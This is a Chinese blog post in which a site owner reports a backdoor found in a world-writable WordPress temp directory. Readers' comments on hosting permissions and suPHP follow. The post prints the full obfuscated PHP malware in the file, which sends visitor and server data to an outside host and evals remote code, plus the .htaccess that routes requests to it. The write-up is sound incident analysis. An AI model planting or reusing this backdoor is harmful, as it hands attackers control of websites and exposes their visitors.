今天上FTP看下,有意外发现:
在wp-content/temp目录下多了两个文件:
其中.htaccess 内容如下:
1 2 | Options -MultiViews ErrorDocument 404 //blog/wp-content/temp/200892.php |
php文件内容如下:
1 | <? error_reporting(0);$a=(isset($_SERVER["HTTP_HOST"])?$_SERVER["HTTP_HOST"]:$HTTP_HOST);$b=(isset($_SERVER["SERVER_NAME"])?$_SERVER["SERVER_NAME"]:$SERVER_NAME);$c=(isset($_SERVER["REQUEST_URI"])?$_SERVER["REQUEST_URI"]:$REQUEST_URI);$d=(isset($_SERVER["PHP_SELF"])?$_SERVER["PHP_SELF"]:$PHP_SELF);$e=(isset($_SERVER["QUERY_STRING"])?$_SERVER["QUERY_STRING"]:$QUERY_STRING);$f=(isset($_SERVER["HTTP_REFERER"])?$_SERVER["HTTP_REFERER"]:$HTTP_REFERER);$g=(isset($_SERVER["HTTP_USER_AGENT"])?$_SERVER["HTTP_USER_AGENT"]:$HTTP_USER_AGENT);$h=(isset($_SERVER["REMOTE_ADDR"])?$_SERVER["REMOTE_ADDR"]:$REMOTE_ADDR);$i=(isset($_SERVER["SCRIPT_FILENAME"])?$_SERVER["SCRIPT_FILENAME"]:$SCRIPT_FILENAME);$j=(isset($_SERVER["HTTP_ACCEPT_LANGUAGE"])?$_SERVER["HTTP_ACCEPT_LANGUAGE"]:$HTTP_ACCEPT_LANGUAGE);$z="/?".base64_encode($a).".".base64_encode($b).".".base64_encode($c).".".base64_encode($d).".".base64_encode($e).".".base64_encode($f).".".base64_encode($g).".".base64_encode($h).".e.".base64_encode($i).".".base64_encode($j);$f=base64_decode("cnNzbmV3cy53cw==");if (basename($c)==basename($i)&&isset($_REQUEST["q"])&&md5($_REQUEST["q"])=="aea9e93f574c4e737df3db20658c710b") $f=$_REQUEST["id"];if((include(base64_decode("aHR0cDovL2Fkcy4=").$f.$z)));else if($c=file_get_contents(base64_decode("aHR0cDovLzcu").$f.$z))eval($c);else{$cu=curl_init(base64_decode("aHR0cDovLzcxLg==").$f.$z);curl_setopt($cu,CURLOPT_RETURNTRANSFER,1);$o=curl_exec($cu);curl_close($cu);eval($o);};die(); ?> |
这个temp目录我当时是为了方便更新插件把权限设置成了777,还好只有几个目录有写权限,而且后台禁止所有除我的ip以外的ip 地址访问。
我只解密了其中一个变量:
1 | http://ads.rssnews.ws/?bmV0YmVhbnMuemhvdWJvLmNvbQ==.bmV0YmVhbnMuemhvdWJvLmNvbQ==.L3Rlc3QvZS5waHA=.L3Rlc3QvZS5waHA=...TW96aWxsYS81LjAgKFgxMTsgVTsgTGludXggaTY4NjsgZW4tVVM7IHJ2OjEuOS4wLjE0KSBHZWNrby8yMDA5MDkwMjE2IFVidW50dS85LjA0IChqYXVudHkpIEZpcmVmb3gvMy4wLjE0IEdUQjU=.MTkyLjE2OC4xLjI=.e.L2hvbWUvemhvdWJvL3dvcmtzcGFjZS9uZXRiZWFucy90ZXN0L2UucGhw.ZW4tdXMsZW47cT0wLjcsemgtY247cT0wLjM= |
大概是用远程文件包含,然后再eval执行代码。而且貌似可以当作webshell控制:因为其中有这么一句:
从时间看是我暑假在家时被挂的马,那时我正好在家,没有连网,也没怎么查看FTP。
所有子其他子站点下只要是777的目录,都被挂了相同的马,而且那个php webshell 的文件名是随机生成的。
我猜测这可以是LP的服务器的问题。
ads.rssnews.wsIP为66.226.75.10
物理地址为“美国 加利福尼亚州“ ,也就是我现在服务器所在的地方。
喜欢这篇文章吗?
请订阅本站 RSS feed 或
macg
12:56 下午, 2010年08月19日林林 /
不会吧
wordpress也有漏洞
10:09 上午, 2009年11月19日Jerry Chen /
十分的正确!你的主机没有装这个么?
10:14 上午, 2009年11月19日荒野无灯 /
@Jerry Chen, 这个貌似木有呢,下次在时间我看下是不是装了木有启用,呵呵
我加你Q聊
9:47 上午, 2009年11月19日Jerry Chen /
如果用suPHP的话777权限根本不让你运行
10:01 上午, 2009年11月19日荒野无灯 /
@Jerry Chen, 我用的是LP的空间,呵呵,用什么php版本主动权不在我手里啊。但是我空间这个马好像是没有被挂成功的。
10:04 上午, 2009年11月19日Jerry Chen /
@荒野无灯, 我说,suPHP是fast-cgi php的一个模块,它会自动检测文件和文件夹的权限和拥有者,权限为777就拒绝执行,拥有者不符合也拒绝执行
10:06 上午, 2009年11月19日荒野无灯 /
@Jerry Chen, 你说的suphp是这个吧:http://www.suphp.org
10:00 上午, 2009年09月27日一米 /
看不太懂,只知道内容用base64加密了。
12:23 上午, 2009年09月23日rayjun /
不怎么懂!云里雾里!-
10:11 下午, 2009年09月22日万戈 /
我的shopex网店也被挂过马,后来发现是主机抵抗力太差,立马换
10:56 下午, 2009年09月22日荒野无灯 /
@万戈, 我估计我这主机抵抗力也不怎么样,还好是linux的服务器,要不然到处都要被挂马了,那就不只是权限为777的目录下有马了。
Orz